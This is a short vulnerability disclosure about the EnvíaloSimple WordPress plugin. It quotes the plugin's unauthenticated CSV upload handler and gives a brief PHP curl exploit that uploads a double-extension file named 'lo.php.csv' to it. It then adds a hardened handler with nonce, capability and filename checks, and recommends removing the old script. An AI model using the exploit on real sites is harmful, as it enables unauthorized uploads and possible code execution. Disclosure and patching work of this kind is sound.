Larry W. Cashdollar
3/28/2015

I'm not sure how useful this is, uploading a csv file:

./marketing/envialosimple-email-marketing-y-newsletters-gratis/php/fileUpload.php

The code below doesn't check for any authentication, only that the file extension is .csv.

<?php

// list of valid extensions, ex. array("jpeg", "xml", "bmp")
$allowedExtensions = array("csv");

// max file size in bytes
$sizeLimit = 10 * 1024 * 1024;

require_once('qqUploadedFileXhr.php');

$uploader = new qqFileUploader($allowedExtensions, $sizeLimit);

// Call handleUpload() with the name of the folder, relative to PHP's getcwd()
$result = $uploader->handleUpload('uploads/');

// to pass data through iframe you will need to encode all html tags
echo htmlspecialchars(json_encode($result), ENT_NOQUOTES);

An exploit:
<?php

$uploadfile="lo.php.csv";
$ch = curl_init("http://target/wp-content/plugins/envialosimple-email-marketing-y-newsletters-gratis/php/fileUpload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('qqfile'=>"@$uploadfile",'name'=>'lo.php.csv'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>
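
A hardened counterpart to the unauthenticated handler above, as an added example that is not the plugin's own code. It assumes the upload is routed through WordPress's admin-ajax mechanism instead of a directly reachable script; the esx_* function names, the 'esx_csv_upload' action and nonce name, the 'manage_options' capability and the 'esx-csv' directory are hypothetical choices.

```php
<?php
// Added example, not the plugin's code. Hypothetical: the esx_* names, the
// 'esx_csv_upload' action/nonce, the 'manage_options' capability, the 'esx-csv' dir.

// Return a server-generated storage name, or null unless the client name is a plain *.csv.
function esx_safe_csv_name(string $clientName): ?string
{
    $base = basename(str_replace('\\', '/', $clientName));
    // One dot-free stem plus ".csv": rejects "lo.php.csv", "x.csv.php" and ".csv".
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.csv\z/', $base)) {
        return null;
    }
    // The client-supplied name is never used on disk.
    return bin2hex(random_bytes(16)) . '.csv';
}

function esx_handle_csv_upload(): void
{
    // 1. Authentication and authorization, which the original endpoint lacks.
    check_ajax_referer('esx_csv_upload');          // dies unless a valid nonce is sent
    if (!current_user_can('manage_options')) {
        wp_send_json_error('forbidden', 403);      // sends JSON and exits
    }
    // 2. Upload sanity checks: single file, no PHP upload error, same 10 MB limit.
    $f = $_FILES['qqfile'] ?? null;
    if (!is_array($f) || $f['error'] !== UPLOAD_ERR_OK || $f['size'] > 10 * 1024 * 1024) {
        wp_send_json_error('bad upload', 400);
    }
    $name = esx_safe_csv_name((string) $f['name']);
    if ($name === null) {
        wp_send_json_error('only plain .csv names are accepted', 400);
    }
    // 3. Store under the WordPress uploads directory with the generated name.
    $dir = trailingslashit(wp_upload_dir()['basedir']) . 'esx-csv';
    wp_mkdir_p($dir);
    if (!move_uploaded_file($f['tmp_name'], $dir . '/' . $name)) {
        wp_send_json_error('store failed', 500);
    }
    wp_send_json_success(array('stored' => $name));
}

// Registered for logged-in users only (no wp_ajax_nopriv_ hook); skipped outside WordPress.
if (function_exists('add_action')) {
    add_action('wp_ajax_esx_csv_upload', 'esx_handle_csv_upload');
}
```

The standalone php/fileUpload.php script would also have to be removed or blocked at the web server, since registering this action does nothing to stop direct requests to the old file.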